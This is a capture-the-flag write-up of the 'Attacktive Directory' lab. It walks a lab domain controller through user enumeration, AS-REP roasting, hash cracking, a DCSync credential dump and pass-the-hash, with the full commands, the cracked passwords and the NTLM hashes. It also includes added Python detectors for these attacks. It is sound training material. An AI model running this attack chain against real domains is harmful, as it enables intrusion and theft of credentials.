🪟 Attacktive Directory

Hello, traveller! In this article I bring you a write-up of the Attacktive Directory challenge.

Context

We have the following target: a Domain Controller (DC) with the IP address 10.10.209.6. The challenge itself also gives us the domain.

Type: Domain Controller (DC)

IP: 10.10.209.6

Domain: spookysec.local

Reconnaissance

To begin the reconnaissance, we can gather a good deal of information with the Enum4linux tool.

enum4linux 10.10.209.6
[...] 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[...]

1. What tool will allow us to enumerate port 139/445? [enum4linux]

2. What is the NetBIOS-Domain Name of the machine? [THM-AD]

3. What invalid TLD do people commonly use for their Active Directory Domain? [.LOCAL]

User enumeration

For the next task, we must enumerate the domain's users with the Kerbrute tool (which is part of the Impacket Python class suite), using the user and password wordlists provided by the challenge itself.

With the -h flag you can see the valid options needed to discover the users.

./kerbrute -h

Running the user enumeration:

./kerbrute userenum --dc 10.10.209.6 -d spookysec.local /usr/share/wordlists/attacktive-directory/userlist.txt
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 18:26:19 >  Using KDC(s):
2023/01/08 18:26:19 >   10.10.209.6:88

2023/01/08 18:26:20 >  [+] VALID USERNAME:       james@spookysec.local
2023/01/08 18:26:26 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2023/01/08 18:26:39 >  [+] VALID USERNAME:       James@spookysec.local
2023/01/08 18:26:43 >  [+] VALID USERNAME:       robin@spookysec.local
2023/01/08 18:27:31 >  [+] VALID USERNAME:       darkstar@spookysec.local
2023/01/08 18:27:59 >  [+] VALID USERNAME:       administrator@spookysec.local
2023/01/08 18:29:23 >  [+] VALID USERNAME:       backup@spookysec.local
2023/01/08 18:30:03 >  [+] VALID USERNAME:       paradox@spookysec.local
2023/01/08 18:33:50 >  [+] VALID USERNAME:       JAMES@spookysec.local
2023/01/08 18:34:59 >  [+] VALID USERNAME:       Robin@spookysec.local
2023/01/08 18:43:09 >  [+] VALID USERNAME:       Administrator@spookysec.local

4. What command within Kerbrute will allow us to enumerate valid usernames? [userenum]

5. What notable account is discovered? [svc-admin]

6. What is the other notable account discovered? [backup]

Exploitation

Now that we have several valid users in the domain, we can use a brute-force attack. In this case, we will use an attack called ASREPRoasting.

An ASREPRoasting attack occurs when a user account has the "Does not require Pre-Authentication" privilege set. This means the account does not need to provide valid identification before requesting a Kerberos ticket for the user account in question.

For this type of attack, we will use another class from the Impacket suite, called GetNPUsers, which lets us find the accounts susceptible to ASREPRoasting present in the KDC (Key Distribution Center). The only requirement to query the accounts is a valid set of users (which we already enumerated via Kerbrute).

python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users2.txt -dc-ip 10.10.209.6 spookysec.local/
Impacket v0.10.1.dev1+20221214.172823.8799a1a2 - Copyright 2022 Fortra

[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:50822f1bbf7182827b71ddbcc8e8067a$81909570e086df06568c0ae7658e6bd2dd3e934c652adfd058f58b457e97a5767f78197a9c6fa1ac403df49eeeabd3582f3e007b2695b3c8829f3b02ee33e4f812768d19c710eb7ce550a15529a8e7b726ed4a6edc6583bb3093a94a7b553cc60e80b36c2954b37448682baf36227f2df69b133d854e29f1d025c27902971e95de3cc56335adc6d03ae14e2a031a98d5743d345226a46e52a78376da35609862b6d06f2d45cbfc9ceda36ae973e72c4de033b3e59301f4b5f3980acecc174281e4d0dc2d965b75ef06910057443d1e26111ad1b485a32555a1029d5521cfa0f3baddb8b386e1d445c2b472eb5ca5bbd3a3db

7. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? [svc-admin]
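Both steps above (the Kerbrute enumeration and the AS-REP request for svc-admin) leave a footprint on the domain controller in Event ID 4768 (Kerberos authentication ticket requested). The following detection logic is an added example, not part of the original write-up: it runs over a handful of constructed 4768 records flattened to key=value pairs (the real event fields are "Result Code", "Pre-Authentication Type" and "Ticket Encryption Type"; the flattened names, the 10.10.14.5 source address and the user names are assumptions for the demo). It flags a burst of 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) failures from one address, which is what probing a user wordlist produces, and any successful TGT issued with pre-authentication type 0 and an RC4 (0x17) ticket, which is exactly the AS-REP that GetNPUsers.py turns into a crackable hash.

```python
# Added example (not from the original write-up): detection of user enumeration
# and AS-REP roasting from Windows Security Event ID 4768 records.
# Sample records, source address and user names below are constructed.
from collections import defaultdict
from datetime import datetime

# Constructed sample. result=0x6 means the principal does not exist,
# preauth=0 means no pre-authentication was performed, etype=0x17 is RC4-HMAC.
SAMPLE_EVENTS = """\
time=2023-01-08T18:26:19 id=4768 user=zzz-nobody ip=10.10.14.5 result=0x6 preauth=- etype=-
time=2023-01-08T18:26:19 id=4768 user=qwerty ip=10.10.14.5 result=0x6 preauth=- etype=-
time=2023-01-08T18:26:20 id=4768 user=admin2 ip=10.10.14.5 result=0x6 preauth=- etype=-
time=2023-01-08T18:26:21 id=4768 user=helpdesk ip=10.10.14.5 result=0x6 preauth=- etype=-
time=2023-01-08T18:26:22 id=4768 user=printer ip=10.10.14.5 result=0x6 preauth=- etype=-
time=2023-01-08T18:26:23 id=4768 user=test ip=10.10.14.5 result=0x6 preauth=- etype=-
time=2023-01-08T18:40:02 id=4768 user=svc-admin ip=10.10.14.5 result=0x0 preauth=0 etype=0x17
time=2023-01-08T09:00:00 id=4768 user=robin ip=10.10.209.50 result=0x0 preauth=2 etype=0x12
time=2023-01-08T09:05:00 id=4768 user=rbin ip=10.10.209.50 result=0x6 preauth=- etype=-
"""


def parse_events(text):
    """Turn key=value lines into dicts; the timestamp becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(item.split("=", 1) for item in line.split())
        fields["time"] = datetime.fromisoformat(fields["time"])
        events.append(fields)
    return events


def find_enumeration_bursts(events, threshold=5):
    """Source IPs with at least `threshold` unknown-principal (0x6) failures
    inside one calendar minute. Returns {ip: highest per-minute count}."""
    per_minute = defaultdict(int)
    for ev in events:
        if ev["id"] == "4768" and ev["result"] == "0x6":
            bucket = ev["time"].replace(second=0, microsecond=0)
            per_minute[(ev["ip"], bucket)] += 1
    flagged = {}
    for (ip, _bucket), count in per_minute.items():
        if count >= threshold:
            flagged[ip] = max(count, flagged.get(ip, 0))
    return flagged


def find_asrep_roast_candidates(events):
    """Successful TGT requests with no pre-authentication and an RC4 ticket:
    the combination that yields an offline-crackable AS-REP."""
    return [
        (ev["user"], ev["ip"])
        for ev in events
        if ev["id"] == "4768"
        and ev["result"] == "0x0"
        and ev["preauth"] == "0"
        and ev["etype"] == "0x17"
    ]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("possible user enumeration:", find_enumeration_bursts(evs))
    print("AS-REP roasting candidates:", find_asrep_roast_candidates(evs))
```

The per-minute bucket is deliberately simple; a sliding window catches bursts that straddle a minute boundary. On the prevention side, the second query is empty if no account has "Do not require Kerberos preauthentication" set and RC4 is disabled for service accounts, which is the fix the write-up's scenario is missing.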

We found a valid user susceptible to ASREPRoasting. Now, to crack the hash with the password wordlist we saved earlier, we need to find out which type of hash we have just obtained. For that, we can consult Hashcat's list of hash types.

Since there are many Kerberos 5 hash types in Hashcat's list, we must look closely at the hash format to find out which mode to use for cracking it.

Hash type identified via GetNPUsers.py

8. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? [Kerberos 5 AS-REP etype 23]

9. What mode is the hash? [18200]
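The etype does not have to be guessed from the wiki: it is the number between the second and third "$" of the line GetNPUsers.py prints. The parser below is an added example, not code from the write-up or from Impacket; it reads that layout ($krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum>$<ciphertext>), validates the hex fields and maps etype 23 to the mode the write-up uses. The sample hash is constructed (random hex), only its layout matches the real output; the mapping table only contains the mode shown on this page.

```python
# Added example (not from the original write-up): parse the $krb5asrep$ line
# printed by GetNPUsers.py and read the etype off it. SAMPLE is constructed.
import re

# For etype 23 (RC4-HMAC) the AS-REP enc-part is a 16-byte HMAC-MD5 checksum
# followed by the RC4-encrypted data; GetNPUsers.py separates the two with '$'.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Only the mode this write-up uses is mapped (assumption: other etypes are
# looked up on the Hashcat example-hashes page rather than hard-coded here).
HASHCAT_MODE = {23: 18200}


def parse_asrep_hash(line):
    """Split a $krb5asrep$ line into its fields and pick the Hashcat mode."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    etype = int(m.group("etype"))
    edata = m.group("edata")
    if len(edata) % 2:
        raise ValueError("ciphertext has an odd number of hex digits")
    return {
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum_bytes": len(m.group("checksum")) // 2,
        "ciphertext_bytes": len(edata) // 2,
        "hashcat_mode": HASHCAT_MODE.get(etype),  # None when the etype is not mapped
    }


# Constructed sample: real layout, made-up checksum and ciphertext bytes.
SAMPLE = (
    "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:"
    "00112233445566778899aabbccddeeff$" + "ab" * 48
)

if __name__ == "__main__":
    info = parse_asrep_hash(SAMPLE)
    print(f"{info['user']}@{info['realm']}: etype {info['etype']} "
          f"-> hashcat -m {info['hashcat_mode']}")
```

An etype of 23 in this line is itself a finding for the defender: it shows the KDC still issues RC4 tickets for that account, which is what makes the offline guess cheap.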

Now we can try to crack the hash with Hashcat.

hashcat -m 18200 hash.txt /usr/share/wordlists/attacktive-directory/passwordlist.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b6fa4c0ae56445ebc248205fe51a2258$399c4cadfb39280a56b80003cdfbf7cf8f73c667cc5fbabad698611853c9d0726ec290a23395c04a343df7a57ab99c36e02f972792b688d9787830a82e7f1505a545484c5c50289142a98449293f26bacc1a57dd691a8eb6c555bc9ccb5b2ef33b23da91128b51e26b1445555991b6d1dc0de7e732e6eed3658ef3c238272e9586f60aa36e58719e23228f205b800091ba9670f5ccb57d3d823143b334529ee1d75ab8946e585612df55b37bd7b94392e4efa64a1dacbac3e23c95862ca7981eaf4b6516b25526b63f93ae1930cf1c0c9aa49c975abff82557186018006edeaa5b7addd211a2c8e09f6a6a6bcf4ec4471f3c:management2005

10. Now crack the hash with the modified password list provided, what is the user account's password? [management2005]

We have a valid credential. Using it, we now need to enumerate the server's shares with the classic SMBClient tool.

11. What utility can we use to map remote SMB shares? [smbclient]

Running the following command line, we can list the active shares:

smbclient -L \\\\10.10.209.6 -U spookysec.local/svc-admin
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backup          Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share

12. Which option will list shares? [-L]

13. How many remote shares is the server listing? [6]

14. There is one particular share that we have access to that contains a text file. Which share is it? [backup]

Accessing the backup share with the credentials we found, we discover a file.

smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3687835 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

15. What is the content of the file? [YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw]

The file's content looks like Base64. Decoding it from the Linux command line, we obtained the following result:

$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860

16. Decoding the contents of the file, what is the full contents? [backup@spookysec.local:backup2517860]

Privilege Escalation

Now that we have access to the server, we can try to elevate our privileges. For that, we will use the secretsdump.py tool, also part of the Impacket suite. If we manage to collect hashes, we can try to elevate privileges with the Pass the Hash method.

python /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.209.6
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:1ced74bb19b4fd8a6e0bf41ad102b86f:::

17. What method allowed us to dump NTDS.DIT? [DRSUAPI]

18. What is the Administrator's NTLM hash? [0e0363213e37b94221497260b0bcb4fc]

19. What method of attack could allow us to authenticate as the user without the password? [Pass the Hash]
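The "DRSUAPI method" in the secretsdump.py output means the backup account asked the DC to replicate the directory the way another domain controller would (often called a DCSync). On the DC this shows up as Event ID 4662 with AccessMask 0x100 (control access) and the replication control-access rights in the Properties field. The detection below is an added example, not part of the write-up: it parses a few constructed 4662 records exported as JSON lines (the record shape, the DC02$ computer account and the SPOOKYSEC short name are assumptions for the demo) and reports every replication request whose subject is not a known DC machine account. The two GUIDs are the real DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights.

```python
# Added example (not from the original write-up): spot directory replication
# requests (DCSync) from non-DC principals in Event ID 4662 records.
# The JSON records below are constructed for the demo.
import json
import re

# Control-access rights that appear in 4662 "Properties" for replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed sample: a legitimate request from another DC's machine account,
# the write-up's scenario (the 'backup' user replicating), and an unrelated
# 4662 with a made-up property GUID and a non-control-access mask.
SAMPLE_4662 = """\
{"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "SPOOKYSEC", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "backup", "SubjectDomainName": "SPOOKYSEC", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "robin", "SubjectDomainName": "SPOOKYSEC", "Properties": "{aaaaaaaa-0000-0000-0000-000000000001}", "AccessMask": "0x10"}
"""


def parse_4662(text):
    """One JSON object per line, as a SIEM export might provide them."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_replication_request(ev):
    """True for a control-access check (0x100) that names a replication right."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
        return False
    rights = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    return bool(rights & REPLICATION_RIGHTS)


def find_dcsync(text, dc_accounts):
    """Replication requests whose subject is not an allow-listed DC machine
    account. Returns DOMAIN\\user strings in log order."""
    allowed = {a.upper() for a in dc_accounts}
    hits = []
    for ev in parse_4662(text):
        if not is_replication_request(ev):
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in allowed:
            continue
        hits.append(ev["SubjectDomainName"] + "\\" + subject)
    return hits


if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_4662, {"DC01$", "DC02$"}):
        print("replication request from non-DC principal:", hit)
```

The allow-list is the important design choice: replication from a DC machine account is normal, from anything else it is a credential dump in progress. The matching preventive check is to review which principals hold these two rights on the domain object, since a user account such as backup only gets to call DRSUAPI because someone granted them.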

The twentieth flag apparently points us to the Evil-WinRM tool, which takes advantage precisely of the Pass the Hash flaw.

evil-winrm -i 10.10.209.6 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

20. Using a tool called Evil-WinRM what option will allow us to use a hash? [-H]

To complete the last part of the challenge, we only need to collect the text files in the Desktop folder of each indicated user. You can do that on your own. :)
